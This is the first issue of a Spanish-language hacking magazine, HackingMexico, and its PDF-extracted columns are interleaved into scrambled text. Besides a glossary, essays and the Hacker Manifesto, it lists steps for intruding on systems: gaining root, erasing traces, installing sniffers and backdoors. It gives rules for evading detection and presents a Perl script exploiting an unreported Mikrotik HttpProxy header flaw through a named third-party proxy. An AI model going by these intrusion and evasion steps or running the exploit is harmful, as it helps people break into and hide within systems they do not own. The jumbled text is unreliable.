Está en la página 1de 46

P U B L C A T E C O N N O S O T R O S

informes 55 10 68 88 09
info@hackingmexico.mx
editorial

Editorial
Bienvenidos a esta primera
publicacion de HackingMexico la
revista mexicana de seguridad
informatica y hacking. Este ejemplar
que tienes en tus manos es el
resultado de un gran esfuerzo por
parte de todo el equipo.
HackingMexico nace con el
objetivo de concientizar y educar
sobre los riesgos actuales de la
seguridad, desde un punto de vista
practico y ofensivo que nos permitira
adentrarnos a la manera de pensar del
atacante.
El material esta enfocado para cualquier
persona que desee adentrarse o pulir sus
conocimientos sobre hacking.
Nuestra mision es fomentar el conocimiento,
recolectar informacion es el primer paso a la
sabiduria, pero compartirla es el primer paso para
construir una comunidad, es por eso que te brindamos un
host gratuito para que publiques tu blog y compartas tus
investigaciones con la comunidad.
Recuerda que todos los enlaces a las descargas del software
que se mencione en la pagina estar listado en el portal oficial
www.hackingmexico.mx, dentro de la seccin de revistas.
Esperemos disfrutes este primer ejemplar, tanto como nosotros
hacindolo.

El Equipo HackingMexico
M.C Raul Robles A. CEO

Agradecimientos a gente
que colaboro en este numero
M4ku4Z CorruptedByte
Axxus Death/ Scarlett Toquero
Profesor X (idea lateral-Despacho Editorial)
Zeus Megabyte
Tognu Helios Mier
Molder Sombrero de Paja Y el apoyo recibido por los alumnos
Dr h47 de El Instituto Tecnologico de
Annika Tuxtepec y la FES Aragon
No nos hacemos responsables por el mal uso de la informa- aprender como defenderse desde un punto de vista ofensivo.
cion aqui expuesta, todo el material es con fines educativos Hackingmexico esta en contra de grupos de choque y ac-
y de investigacion, hackingmexico no incita a ningun tipo tivismo como Anonymous, nosotros somos un grupo de
de vandalismo virtual, cyberbullying, ni cyberamenzas. profesionales expertos en seguridad informatica que no
La informacion es para conocimiento de todos, para poder apoyan este tipo de actividades delictivas.

2 www.hackingmexico.mx
haxorpedia
Haxorpedia

A qui se explicaran terminos


que se usaran a lo largo de
las publicaciones, para
que vayas adentrndote
un poco mas, y aclares tus dudas
cuando se hable de algn termino
que no comprendas.
No encontraras la definicin
standard de Wikipedia, sino una de-
finicin compacta y de bolsillo sin
tanto rollo que te permitir entender
los conceptos rapidamente

esteganografia leet
Tecnicas de ocultamiento de cdigo dentro Termino usado para describir a la elite
de archivos, usualmente de imagen de los hackers, tambien es referido
como l33t

hacktivismo
Movimiento hacker con ideales polticos 0day
o de carcter social Vulnerbilidad en un sistema que no ha
sido del dominio publico, que lleva 0

Cyruxnet dias activa

Portal antiguo de internet que


publicaba bugs y 0days Bug hax0r
Error en un Hacker
Jailbreak sistema, un bicho.
Exploit
Proceso el cual te deja instalar
aplicaciones no autorizadas por Apple
en dispositivos con iOS
elite
Minoria selecta
Codigo o tecnica
que explota una
vulnerabilidad.

Ingenieria Social Cookie


Tecnicas donde el objetivo es el ser
Archivo donde se guardan datos como
humano, burlar la ingenuidad.
sesiones, passwords y tiempos.

Cracking
Metodos para saltear protecciones en software
XSS
Cross Site Scripting, tecnica que permite
como por ejemplo los Trial de 30 dias.
el robo de cookies.

www.hackingmexico.mx 3
CONTENTS PAGE

a quin les llamado


un hacker

06
El navegacin anonima
manifiesto ocultando nuestras
hacker huellas en internet

10 16
Hackintosh jailbreak en
dispositivos IOS

24

robo de identidad
mediante crimeware
30
4 www.hackingmexico.mx
vulnerabilidad
facebook: explotando mikrotik httpproxy
callando al
al ser humano chismoso

12 14
hacking
microsoft
c#

22
Robo de
cuentas
FTP

26
riesgos de
seguridad old school
en IPV Cyruxnet

6 40
www.hackingmexico.mx 5
a quin le es llamado un hacker
contents page

Aquinle es llamado un
Hack
^POr
Jess Antonio
Alvarez Cedillo
Tognu
IPN-CIDETEC

L legando al ao 2000,
los piratas de los sis-
temas informticos
se representan con
una persona con un cerebro desa-
rrollado, curioss y con muy pocas
armas: una simple computadora y
una lnea telefnica. Hackers. Una
palabra que an no se encuentra en
En el 2000 Microsoft desarrollo
un concepto que ha marcado desde
entonces
llamada
llaman
informticos.
su
piratas
ojo ni un
ya
una actividad ilegal
PIRATERIA,
paratas a
Resulta
no
garfio
aunque tambin
los
tienen
en
delincuentes
que
un
ahora los
reemplazo
parche en
de la
los diccionarios pero que ya suena
mano. Tampoco existen los barcos ni los
en todas las personas que alguna
tesoros escondidos debajo del mar, tampoco
vez se interesaron por la informti-
matan, asesinan y violan mujeres.
ca o leyeron algn diario. Proviene
de hack, el sonido que hacan los
(crack=destruir) son aquellas personas que
tcnicos de las empresas telefnicas al gol-
siempre buscan molestar a otros, piratear
pear los aparatos para que funcionen.
software protegido por leyes, destruir sis-
Hoy es una palabra temida por em-
temas muy complejos mediante la transmi-
presarios, legisladores y autoridades que
sin de poderosos virus, etc.
desean controlar a quienes se divierten
Generalmente son adolescentes inquie-
descifrando claves para ingresar a lugares
tos que aprenden rpidamente este comple-
prohibidos y tener acceso a informacin
jo oficio. Se diferencian con los Hackers
indebida. En 1997, el 54 %de las empresas
porque no poseen ningn tipo de ideologa
norteamericanas sufrieron ataques en sus
cuando realizan sus trabajos. En cambio,
sistemas y ocasionaron prdidas totales de
el principal objetivo de los Hackers no es
137 millones de dlares en ese mismo ao.
convertirse en delincuentes sino pelear
El Pentgono, la CIA, UNICEF, La
contra un sistema injusto utilizando como
ONU y diversos organismos mundiales
arma al propio sistema. Su guerra es silen-
han sido vctimas de intromisiones.
ciosa pero muy convincente.
Un hacker puede tardar meses en vul-
La cultura popular define a los hackers
nerar un sistema ya que son cada vez ms
como aquellos que, con ayuda de sus cono-
sofisticados. Pero el lema es viejo: hecha la
cimientos informaticos consiguen acceder a
ley, hecha la trampa.
los sistemas de los bancos y de los negocia-
Microsoft por su parte, el sistema ope-
dos del gobierno. Bucean por informacion
rativo ms popular y el ms atacado y los
que no les pertenece, roban software caro y El termino comenzo a usarse aplicando-
medios de comunicacin masivos prefie-
realizan transacciones de una cuenta banca- lo a un grupo de pioneros de la informatica
ren tildarlos de delincuentes que intercep-
ria a otra. Los criminologos, por otra parte, del MIT, a principios de la decada de 1960.
tan cdigos de tarjetas de crdito y los uti-
describen a los hackers en terminos menos Desde entonces, y casi hasta finales de la
lizan para beneficio propio.
halagadores. Donn Parker los denomina vio- decada de 1970, un hacker era una persona
Sin embargo tambin existen los que se
ladores electronicos y August Bequai los obsesionada por conocer lo mas posible so-
intrometen en los sistemas de aeropuertos
describe como vandalos electronicos. Am- bre los sistemas informaticos (Figura2). Los
produciendo un caos en los vuelos y en los
bos, aunque aseveran que las actividades de diseadores de la computadora Apple, Jobs
horarios de los aviones. Pero he aqu la
los hackers son ilegales, eluden habilmente y Wozniack, pueden considerarse hackers
gran diferencia en cuestin. Los crackers
llamarlos criminales informaticos. en este sentido de la palabra.

6 www.hackingmexico.mx
er

www.hackingmexico.mx
7
a quien le es llamado un hacker
a quin le es llado un hacker

A principios de la decada de
1980, influenciados por
Hacker:una persona

Hack
la difusion de la pelicula
Juegos de Guerra, y el am-
obsesionada por
pliamente publicado arresto de una ban-
da de hackers conocida como la 414, los
conocer lo mas
hackers pasaron a ser considerados como
chicos jovenes capaces de violar sistemas
posible sobre
informaticos de grandes empresas y del
gobierno. Desgraciadamente, los medios
los sistemas
de informacion y la comunidad cientifica
social no ha puesto mucho esfuerzo por
informaticos.
variar esta definicion. El problema para
llegar a una definicion mas precisa radi-
ca, tanto en la poca informacion que hay
sobre sus actividades diarias, como en el
hechos que Parker califica como de hac-
hecho de que lo que se conoce de ellos
ker. Bequai confunde aun mas el termi-
no siempre cabe bajo las etiquetas de los
no al definir al hacker como alguien que
delitos conocidos.
utiliza ilegalmente las tarjetas de credito
Parker reconoce que el hacking no
telefonico para acceder a sistemas que
abarca todo el rango de actividades aso-
distribuyen software comercial ilegal-
ciadas a la violacion de los sistemas in-
mente. Veremos que esto tiene poco que
formaticos, pero lo prefiere al termino
ver con las actuaciones propias de los ha- hacker se reser-
phreaking, que considera muy oscuro.
ckers, pero es ilustrativa de otros tipos de va generalmente a
Por otra parte, Bequai no rechaza el ter-
actividades informaticas inusuales. aquellos que se dedi-
mino phreaking y a menudo lo aplica a
Los terminos, hacker, phreaker can al segundo tipo.
y pirata se presentan y definen En otras palabras, un ha-
tal y como los entienden aque- cker es una persona que tiene el
llos que se identifican con estos conocimiento, habilidad y deseo de
METODOLOGIA PARA papeles.En primer lugar, el area explorar completamente un sistema infor-

HACKEAR de los hackers. En la tradicion de


esta comunidad informatica, el
hacker puede realizar dos tipos
de actividades:
matico. El mero hecho de conseguir el ac-
ceso (adivinando la clave de acceso) no es
suficiente para conseguir la denominacion.
Debe haber un deseo de liderar, explotar y
Para aquellos que quieren realizar usar el sistema despues de haber accedido a
1. Acceder a un sistema informa- l. Esta distincion parece logica, ya que no
esta actividad, existe una metodolo- tico: el termino lleva asociados todos los intrusos mantienen el interes una
ga conocida, sin embargo siempre las herramientas y trucos para vez que han logrado acceder al sistema. En
obtener cuentas de usuarios va- el submundo informatico, las claves de ac-
hay cosas que aprender. La meto- lidos de un sistema informatico. ceso y las cuentas
dologa es la siguiente: suelen intercambiarse y ponerse a dis-
2. Explorar y aprender a utilizar posicion del uso general. Por tanto, el hecho
un sistema informatico. de conseguir el acceso puede considerarse
1. Introducirse en el sistema que como la parte facil, por lo que aquellos
Contrariamente a lo que piensan que utilizan y exploran los sistemas son los
tengamos como objetivo. los medios de comunicacion, la que tienen un mayor prestigio.
2. Una vez conseguido el mayoria de los hackers no destru- La segunda actividad es la de los
yen y no daan deliberadamente phreakers telefonicos. Se convirtio en una
acceso, obtener privilegios los datos. El hacerlo iria en contra actividad de uso comun cuando se publi-
de root (superusuario). de su intencion de mezclarse con el caron las aventuras de John Draper, en un
usuario normal y atraeria la aten- articulo de la revista Esquire, en 1971. Se
3. Borrar las huellas. cion sobre su presencia, haciendo trata de una forma de evitar los mecanis-
4. Poner un sniffer para que la cuenta usada sea borrada. mos de facturacion de las compaas tele-
Despues de gastar un tiempo sus- fonicas. Permite llamar a de cualquier par-
conseguir logins de otras tancioso en conseguir la cuenta, te del mundo sin costo practicamente. En
personas. el hacker pone una alta prioridad muchos casos, tambien evita, o al menos
para que su uso no sea descubierto. inhibe, la posibilidad de que se pueda tra-
5. Instalar puertas traseras Ademas de la obvia relacion en- zar el camino de la llamada hasta su origen,
tre las dos acepciones, la palabra evitando asi la posibilidad de ser atrapado.

8 www.hackingmexico.mx
a quien le es llado un hacker
Un Hacker

Emblema Hacker. (figura 3)


generalmente

ker
tiene sus
reglas aunque
estas sean
muy sencillas,
estas son:

TAXONOMIA HACKER
La clasificacin general de las activi-
I Nunca destroces nada intencionalmente
en la Computadora que ests crackeando.

dades de un hacker son clasificadas por


la idiologia con la que actua. Los colores
representan una ideologa y un compor-
II Modifica solo los archivos que hagan
falta para evitar tu deteccin y asegu-
rar tu acceso futuro al sistema.
tamiento. La clasificacin solo tiene tres
categorias hacker:

1. Black hats: Gente apasionada por


III Nunca dejes tu direccin real, tu nom-
bre o tu telfono en ningn sistema.

la seguridad informtica. Esto con-


cierne principalmente a entradas re-
motas no autorizadas por medio de
IV Ten cuidado a quien le pasas in-
formacin. A ser posible no pases
nada a nadie que no conozcas su voz, nme-
redes de comunicacin como Internet ro de telfono y nombre real.
para sacar o no provecho.

2. White hats: Incluye a aquellos que de-


puran y arreglan errores en los sistemas.
V Nunca dejes tus datos reales en un
BBS, si no conoces al sysop, djale
un mensaje con una lista de gente que pueda
responder de ti.
Par la mayor parte de los miembros
3. Grey hats:A los de moral ambigua.

VI
del submundo informatico, esta es sim-
Nunca hackees en computadoras
plemente una herramienta para poder rea-
QUE SE NESECITA del gobierno. El gobierno puede
lizar llamadas de larga distancia sin tener
PARA SER UN HACKER? permitirse gastar fondos en buscarte mien-
que pagar enormes facturas. La cantidad
Los hackers necesitan caros equipos tras que las universidades y las empresas
de personas que se consideran phreakers,
informticos y una estantera rellena de particulares no.
contrariamente a lo que sucede con los hac-
manuales tcnicos?. La respuesta es NO!

VII
kers, es relativamente pequea. Pero aque-
,Hackear puede ser sorprendentemen- No uses BlueBox a menos que
llos que si se consideran phreakers lo hacen
te fcil, mejor todava, si se sabe cmo no tengas un servicio local o
para explorar el sistema telefonico.
explorar el World Wide Web, se puede un 0610 al que conectarte. Si se abusa de la
La mayoria de la gente, aunque usa
encontrar casi cualquier informacin re- bluebox, puedes ser cazado.
el telefono, sabe muy poco acerca de l.
lacionada totalmente gratis. De hecho,

VIII
Los phreakers, por otra parte, quieren
hackear es tan fcil que si se tiene un ser- No dejes en ningn BBS mu-
aprender mucho sobre el. Este deseo de
vicio on-line y se sabe cmo enviar y leer cha informacin del sistema
conocimiento lo resume asi un phreaker
un e-mail, se puede comenzar a hackear que estas crackeando. Di sencillamente estoy
activo: El sistema telefonico es la cosa
inmediatamente. LA TECNICA llamada trabajando en un UNIX o en un COSMOS....
mas interesante y fascinante que conoz-
GOOGLE HACKING (figura 4) es una pero no digas a quien pertenece ni el telfono.
co. Hay tantas cosas que aprender. Inclu-
herramienta simple y sencilla donde solo

IX
so los phreakers tienen diferentes areas
se necesita un navegador de Internet y el No te preocupes en preguntar, na-
de conocimiento.
servicio de busqueda GOOGLE. die te contestara, piensa que por
El emblema hacker, un proyecto para
responderte a una pregunta, pueden cazarte
crear un smbolo reconocible para la per-
a ti, al que te contesta o a ambos.
cepcin de la cultura hacker. General-

X
mente este simbolo vienen de el juego
Punto final. ce hackeando, no sabrs
Google Hacking.

de la vida, un programa que representa el


lo que es.
inicio de la inteligencia
artificial y que por conviccin es
aceptado por todas las comunidades ha-
ckers del mundo (figura 3).

www.hackingmexico.mx 9
el manifiesto hacker

mani
Uno ms ha sido capturado hoy, Hoy hice un descubrimiento.
Est en todos los peridicos. Encontr una computadora.
Adolescente arrestado por delito informtico Espera un momento, esto es lo mximo. Esto hace lo que yo le
Hacker arrestado por irrumpir en un sistema bancario. pida. Si comete un error es porque yo me equivoqu.
No porque no le gusto . . .
//-Malditos muchachos. Son todos iguales.// O se siente amenazada por mi . . .
Pero pueden, con su psicologa barata y su cerebro de los aos O piensa que soy un engredo . . .
cincuenta, siquiera echar un vistazo a lo que hay detrs de los O no le gusta ensear y no debera estar aqu . . .
ojos de un hacker? Se han parado alguna vez a pensar qu es lo //-Maldito muchacho. Todo lo que hace es jugar. Todos son iguales.//
que le hace comportarse as, qu le ha convertido en lo que es?
Soy un Hacker, entra a mi mundo . . . Y entonces ocurri . . .
El mo es un mundo que comienza en la escuela . . . una puerta abierta al mundo . . .
Soy ms inteligente que la mayora de los otros muchachos, esa Corriendo a travs de las lneas telefnicas como la herona a
basura que ellos nos ensean me aburre . . . travs de las venas de un adicto, un pulso electrnico es enviado,
//-Malditos subrealizados. Son todos iguales.// un refugio para las incompetencias del da a da es buscado . . .
una tabla de salvacin es encontrada.
Estoy en la preparatoria. Este es . . . este es el lugar a donde pertenezco . . .
He escuchado a los profesores explicar por decimoquinta vez Los conozco a todos aqu . . .
como reducir una fraccin. aunque nunca los hubiera visto, o hablado con ellos, o nunca vuelva
Yo lo entiendo. a escuchar de ellos otra vez . . Los conozco a todos . . .
-No, Srta. Smith, no le voy a mostrar mi trabajo, //-Malditos muchachos. Enlazando las lneas telefnicas otra vez.
lo hice en mi mente . . . Todos son iguales . . .//
//-Maldito muchacho. Probablemente se lo copi. Todos son iguales.// Apuesta lo que quieras a que todos somos iguales . . .

10 www.hackingmexico.mx
lE

el manifiesto hacker
fiesto Hacker

Nos han estado dando comida para bebs con cuchara en la es-
cuela, cuando estbamos hambrientos de carne . . . asesinan, engaan y nos mienten
Las migajas de carne que ustedes dejaron escapar estaban masti- y tratan de hacernos creer que es por nuestro bien,
cadas y sin sabor. ahora nosotros somos los criminales.

Hemos sido dominados por los sdicos, o ignorados por los apticos. Si, soy un criminal.
Los pocos que tenan algo que ensearnos encontraron en noso- Mi crimen es la curiosidad.
tros alumnos atentos, pero esos pocos son como gotas de agua en Mi crimen es el juzgar a las personas por lo que dicen y piensan,
el desierto. no por como se ven.
Mi crimen es ser mucho ms inteligente que ustedes, algo por lo
Este es nuestro mundo ahora . . . cual jams podrn perdonarme.
El mundo del electrn y el switch, la belleza del baudio.
Hacemos uso de un servicio que ya existe sin pagar, por que po- Soy un Hacker, y este es mi manifiesto.
dra ser ridculamente barato, si no estuviera en manos de gloto-
nes hambrientos de ganancias, y ustedes nos llaman criminales. Pueden detener a este individuo, pero no podrn detenernos a
Nosotros exploramos . . . todos despus de todo, todos somos iguales.
y ustedes nos llaman criminales.
Nosotros buscamos detrs del conocimiento . . .
y ustedes nos llaman criminales.
Nosotros existimos sin color, sin nacionalidad, sin prejuicios re-

TheMentor
ligiosos . . . y ustedes nos llaman criminales.
Ustedes construyen bombas atmicas,
ustedes hacen la guerra,

www.hackingmexico.mx 11
vanidad mi pecado favorito

vanidad
Mi pecado
favorito Fenomeno social
Independientemente de si eres religioso, todos hemos caido en uno u otro de los
pecados capitales, los que hayan visto la pelicula de El abogado del diablo recordaran
una frase peculiar.
Y esto es precisamente lo que explotan las redes sociales. Muchos de nosotros por
ahi del 2000 nos preocupabamos por que alguien tuviera el control de nuestras vidas y
nuestros movimientos, nos preocupabamos por la privacidad, se nos hacia factible que el
gobierno implantara chips en nuestro cuerpo para poder rastrearnos via GPS, seria el final de
nuestra privacidad cierto?

Explotando la vanidad
Pues no se necesito de un gobierno imperialista que llevara a cabo esas acciones de control, nosotros
mismos sin que nadie nos obligue hacemos check in en facebook, o taggeamos a la gente con la que
estamos, dejamos un mapa de nuestras vidas plasmado en el mundo virtual, esta informacion es visible en
su mayoria, cualquier stalker podria saber a que lugares vas, con quien vas, con que frecuencia, y nosotros
mismos facilitamos esto simplemente por vanidad.
Queremos que nos vean hacer check in en el antro de moda, algun concierto, o tal vez que vean que diario
vas a comer a lugares elegantes, o que te la pasas de vacaciones en Europa.
Por ejemplo un criminal podra utilizar esta informacin para saber que no estas en casa, que te fuiste a un
concierto y que regresaras en muchas horas.
Las vidas de todos en las redes sociales se ven tan maravillosas, todos tienen muchos amigos, y van a salir a fies-
tas, y se la pasan super increible no? Todo mundo quiere mostrar que su vida es extrema, y llena de aventuras.
Una vez mas el intelecto humano ha sido explotado, no se necesito de un big brother para monitorear a la raza huma-
na, han explotado nuestra VANIDAD.

Alterando el curso de la vida


La gente en tu vida, esta por temporadas, salvo la familia y algunas exepciones. Facebook nos facilita conectarnos con gente de
nuestro pasado, regresar con antiguas novias (regresar con una ex , es como ir a la venta de garaje y comprar tus porqueras de
nuevo), y esto hace que perdamos la oportunidad tal vez de conocer gente nueva que estaba destinada para nosotros, desde tiempos
antropolgicos las relaciones del ser humano han sido temporales, y ahora estamos alterando el curso natural de la vida.

Facebook : Expl
12 www.hackingmexico.mx
POr
M.C Raul Robles A
Megabyte al serhu
vanidad mi pecado favorito
EXIF Exchangeable
image file format
Definicion de Wikipedia:
Las etiquetas (tags) de metadatos definidas en el estndar Exif cubren un amplio espectro
incluido:
Informacin de fecha y hora. Las cmaras digitales registran la fecha y la hora actual y la
almacenan en los metadatos.
Configuracin de la cmara. Esta incluye informacin esttica como el modelo de cmara y el
fabricante, e informacin que varia con cada imagen como la orientacin, apertura, velocidad del
obturador, distancia focal, medidor de exposicin y la velocidad de la pelcula.
Informacin sobre localizacin, la cual podra provenir de un GPS conectado a la cmara. Hasta el
2004 solo una pocas cmaras lo soportaban

Geolocalizacion
Cada foto que tomas con tu Smartphone, por lo regular trae geolocalizacion activada. Estos datos se guardan
en forma de metadatos, embedidos en cada foto, que pueden ser extraidos fcilmente, y nos revelan una cantidad
enorme de datos, incluyendo tu localizacin exacta con coordenadas GPS
A travez de una sencilla aplicacin, podemos extraer las coordenadas GPS de la foto, y hacer uso de las API de
google maps, lo cual resulta en un punto en el mapa donde la foto fue tomada.
Existen varias herramientas para extraer estos datos, tales como creep.py un programa hecho en phyton que nos da una
interfaz grafica para geolocalizar usuarios a travez de twitter. Tambien puedes probarlo sin bajar ningn tipo de software
mediante la pagina exifdata.com

Conclusion
Para evitar que tu privacidad sea violada, desactiva la geolocalizacion de tu Smartphone, aunque algunos servicios como twitter ya
borran los metadatos de las fotos, hay muchos otros que siguen sin hacerlo.

otando
mano www.hackingmexico.mx 13
vulnerabilidad

Vulnerabili
C uando navegamos en la nube
y queremos mantener nuestro
anonimato es comn recurrir
al uso de PROXYS que no son mas que otra
computadora que con ayuda de un software
sirve de intermediara en la comunicacin
presentndose como nosotros.

Existen principalmente 3 tipos de proxys.


1. Proxy Tranparente: Este tipo de pro-
xy agrega a nuestras peticiones HTTP
cabeceras para anunciar su uso (X-
Proxy-ID, Via) ademas del origen de la
peticin (X-Forwarded-For).
2. Proxy Annimo: Agregan cabeceras
de reconocimiento de proxy (X-Proxy-
ID, Via) sin embargo no agrega la ca-
becera X-Forwarded-For.
3. Proxy de Alto anonimato: Este tipo
de proxy no modifica la peticin HTTP
original imposibilitando en primera
instancia la deteccin de su uso y mu-
cho menos nuestra identidad.

La cabecera HTTP que mas nos causara problemas de las antes HTTP /1.1 200 OK
mencionadas es X-Forwarded-For ya que en ella se almacenan las DATE:WEB,30 HAR 2011 17:17:41 GHT
direcciones IP que han tenido lugar en la comunicacin y por lo Server:Apache/2.214(Unix) PHP /5.3.2
tanto nuestra IP original. Transfer-Encoding:chunked
Content-Type:message/http
A que problema nos enfrentamos? 92
Es comn la escaeces de proxys annimos de uso publico por lo Trace/HTTP/1.1
tanto solo sobran los proxys transparentes que exponen nuestra Host:www.metroflog.com
identidad. Veamos aqu un ejemplo de peticin HTTP con un pro- X-Proxy-ID:2863273154
xy transparente: X-Forwarded-For:201
V1a:1.1 192.168.10.1 (Mikrotik HttpProxy)

Como podemos ver el Servidor proxy modifica la peticin original


agregando cabeceras que irn con el chisme de quienes somos.

14 www.hackingmexico.mx
dad

vulnerabilidad
Por Molder Sombrero de Paja
molder@aztlan-hack.org
Aztlan Hack / http://www.aztlan-hack.org

Mikrotik HttpProxy
Callando al Chismoso

Como solucionamos el problema?


Afortunadamente para nosotros existe una vulnerabilidad en Servidores Proxy que usan soft-
ware Mikrotik HttpProxy. Esta vulnerabilidad nos permite alterar la cabecera X-Forwarded-
For evitando que nuestra IP real sea enviada, para lograrlo debemos agregar esta cabecera
desde el inicio de la comunicacin es decir desde el momento que sale de nuestra computa-
dora dndole como valor un Final de cadena con el fin de que el software del proxy ignore
lo que se pueda agregar a lo largo de la comunicacin.

X-Forwarded-For=\0 X-Forwarded-For=\0,xxx.xxx.xxx.xxxX-Forwarded-For=\0

A continuacin aremos una prueba de explo- Al ejecutar el script obtenemos el siguiente


tacin de la vulnerabilidad haciendo una peti- resultado:
cin HTTP desde un pequeo script en PERL
y usando como proxy 41.204.56.89:8080. alinux-6nwf:/srv/www/htdocs/
Notemos que agregamos X-Forwarded- tracing> perl http.peal TRACE
For:\0 en la cabecera de la peticin. www.metroflog.com
HTTP/1.1 200 OK
#!/usr/bin/perl Date: web, 38 Har 2011
#Sombrero de paja Molder 17:19:17 GHT
#30 Mar 2011 Server: Apache/2.2.14 (Unix)
PHP/5.3.2
use IO::Socket::INET; Transfer-Encoding: chunked
Content-Type: message/http
$host = $ARGV[1];
$method = $ARGV[0]; 84
$proxy = 41.204.56.89; TRACE/HTTP/1.1
$puerto = 8080; Host:www.metroflog.com
X-Forwarded-For:
my $sock = IO::Socket::INET- X-Proxy.ID:2863273154
>new(PeerAddr => $proxy Via: 1.1 192.168.10.1
PeerPort => $puerto, (Mikrotik HttpProxy)
Proto => tcp);
Como podemos ver la cabecera X-Forwar-
print $sock $method / ded-For aparece sin contenido y conse-
HTTP/1.1\r\nHost: $host\r\ cuentemente nuestra IP no fue enviada vol-
nConnection: Keep-Alive\r\nX- viendo as un PROXY TRASPARENTE
Forwarded-For:\0\r\n\r\n; en un PROXY ANONIMO.
Para un uso mas mundano esto lo po-
while($linea = <$sock>) demos lograr con algunos plugins como
{ el llamado Modify Header de Firefox el
print $linea; cual nos permite agregar o modificar el va-
} lor de las cabeceras HTTP antes de iniciar
la comunicacin.

Esta Vulnerabilidad no ha sido reportada y


hasta la fecha sigue en funcionamiento.

www.hackingmexico.mx 15
navegacin annima

NAVEGACIN
ANNIMA
OCULTANDO
NUESTRAS HUELLAS
E N I N T E R N E T

D
Por Rodolfo H.Baz aKa Pr@fEsOr X

ese evento y sinti que no lo podan de- hacia los servicios que nos conectemos, en
tectar y pues no previo ciertas cosas y en este caso Internet, donde el usuario tiene
menos de 20 minutos ya haba sido detec- una IP interna, la cual es asignada por el
tado y lo estaban ya sacando del evento. protocolo DHCP, y que por default en la
xD, que recuerdos. Ahora si como dice el mayora de los casos est estructurada en
esde los primeros das del ao 1999, en dicho el diablo sabe ms por viejo que por el rango 192.168.1.XX donde las XX se-
que en esos aos empezaran mis andanzas diablo con esta moraleja quiero prevenir rian nmeros asignados del 1 al 254, una
por internet y sus alrededores me vi en la a todos nuestros lectores y lo pondr entre vez asignada el router se conecta con el ISP
necesidad de ocultar mi identidad, esto con comillas que tengan en la mente que nun- Internet Service Provider con el cual te-
el fin de hacer ms complicado el rastrear- ca de los nunca ocultaremos nuestra IP al nemos contratado el servicio de Internet y
me, por obvias razones ;), en esta serie de 100% y que siempre habr forma de ras- este nos asigna una IP que en nuestro caso
artculos trataremos de explicar todas las trearte y localizarte. en servicios caseros sera una IP Dinmica
tcnicas que son usadas para ocultar nues- Publica y con esta podremos navegar en
tra identidad ya sea en redes internas o ex- CONEXINES POR internet adems es la que nos identificar
ternas como lo es el ciberespacio, para que DEFAULT A INTERNET y quedar registrada en los logs de todos
no les vaya a pasar como a un amigo que Normalmente una conexin a internet los lugares que visitemos, esta IP es como
en un evento masivo quiso atacar con una la hacemos de nuestra computadora a un nuestra huella digital que queda plasmada
denegacin de servicio a los servidores de router el cual sirve como puerta de enlace en todo lo que tocamos, ah est el punto y

16 www.hackingmexico.mx
navegacin annima
el detalle como deca Cantinflas, el chiste
de todo esto es que la IP que nos asigna
nuestro ISP y que nos identifica, no quede
guardada en los servidores que visitamos,
sea hay que camuflajearla con otra IP para
que la que quede almacenada no sea la de
nosotros si no la de otra PC as podremos
navegar con cierto grado de anonimato.
Los Proxy
TECNICAS DE
NAVEGACIN ANONIMA Ventajas Desventajas
USADAS EN LA ACTUALIDAD En general, los proxies hacen En general, el uso de un
Existen muchas tcnicas de navegacin posibles varias cosas nuevas: intermediario puede provocar:
annima que pueden ser usadas ya sea in-
dividualmente o combinadas, que darn un Control. Slo el intermediario Abuso. Al estar dispuesto a
cierto rango de anonimato, a mi punto de hace el trabajo real, por tanto se recibir peticiones de muchos
vista la mejor forma de ocultarnos es usar- pueden limitar y restringir los usuarios y responderlas, es
las en su forma combinada para incremen- derechos de los usuarios, y dar posible que haga algn trabajo
tar el rango de efectividad. permisos slo al Proxy. que no toque. Por tanto, ha de
Entre las tcnicas usadas hoy en da te- controlar quin tiene acceso y
nemos las siguientes: Ahorro. Por tanto, slo uno quin no a sus servicios, cosa
Proxy Server de los usuarios (el Proxy) ha que normalmente es muy difcil.
Proxy Chain Server de estar equipado para hacer el
Wingate trabajo real. Carga. Un Proxy ha de hacer
Bouncers el trabajo de muchos usuarios.
Mac Spoofing Velocidad. Si varios clientes
Red Distribuida TOR van a pedir el mismo recurso, el Intromisin. Es un paso ms
VPN Tunelling Proxy puede hacer cach: guardar entre origen y destino, y algunos
HTTP Headers Spoofing la respuesta de una peticin para usuarios pueden no querer pasar
WGroup Spoofing darla directamente cuando otro por el Proxy. Y menos si hace de
Tcnicas de verificacin de Identidad usuario la pida. As no tiene que cach y guarda copias de los datos.
Entre otras volver a contactar con el destino, y
acaba ms rpido. Incoherencia. Si hace
PROXY SERVER de cach, es posible que se
La primera forma y la ms sencilla de usar Filtrado. El Proxy puede equivoque y d una respuesta
y es conectarnos a Internet por medio de negarse a responder algunas antigua cuando hay una ms
un servidor Proxy de Web ms conocido peticiones si detecta que estn reciente en el recurso de destino.
como Proxy, estos nos permiten conectarnos prohibidas.
a otros equipos de una red de forma indirecta Irregularidad. El hecho de
a travs de l, cuando un equipo de la red de- Modificacin. Como que el Proxy represente a ms de un
sea acceder a una informacin o recurso, es intermediario que es, un Proxy usuario da problemas en muchos
realmente el Proxy quien realiza la comuni- puede falsificar informacin, o escenarios, en concreto los que
cacin y a continuacin traslada el resultado modificarla siguiendo un algoritmo. presuponen una comunicacin
al equipo inicial. En unos casos esto se hace directa entre 1 emisor y 1 receptor
as porque no es posible la comunicacin di- Anonimato. Si todos los (como TCP/IP).
recta y en otros casos porque el Proxy aade usuarios se identifican como uno
una funcionalidad adicional, como puede ser slo, es difcil que el recurso
la de mantener los resultados obtenidos (por accedido pueda diferenciarlos.
ej.: una pgina Web) en una cache que per- Pero esto puede ser malo, por
mita acelerar sucesivas consultas coinciden- ejemplo cuando hay que hacer
tes. Con esta denominacin general de Proxy necesariamente la identificacin.
se agrupan diversas tcnicas.

www.hackingmexico.mx 17
navegacin annima

En concreto lo que debe- Una vez que escogimos un


mos hacer para utilizar un buen servidor Proxy tenemos
servidor Proxy Web es primero que decirle a nuestro equipo que
conseguir un Proxy (nmero y se conecte a travs de l, para eso
puerto). Podemos sacar uno de esta vamos a ir (usando FIREFOX) a He-
pgina: http://www.publicproxyser- rramientas > opciones > avanzado > red
vers.com/ > Configurar como se conecta Firefox y
Una vez que consigamos el Proxy despus escribimos nuestro Proxy en las
y nos aseguremos que sea bueno, que casillas de abajo (direccin por un lado
significa cuando digo que sea bueno?, y puerto por otro) y seleccionamos la
como podrn ver en la link que les di casilla usar el mismo proxy para todo
encontrarn algo como esto:(imagen) en el caso que vayas a usar el proxy para
conectarte a un ftp o una conexin SSL
IP Port Type Country Last Test

203.160.1.54 80 transparent Vietnam 2012-01-18


200.174.85.193 3128 transparent Brazil 2012-01-18
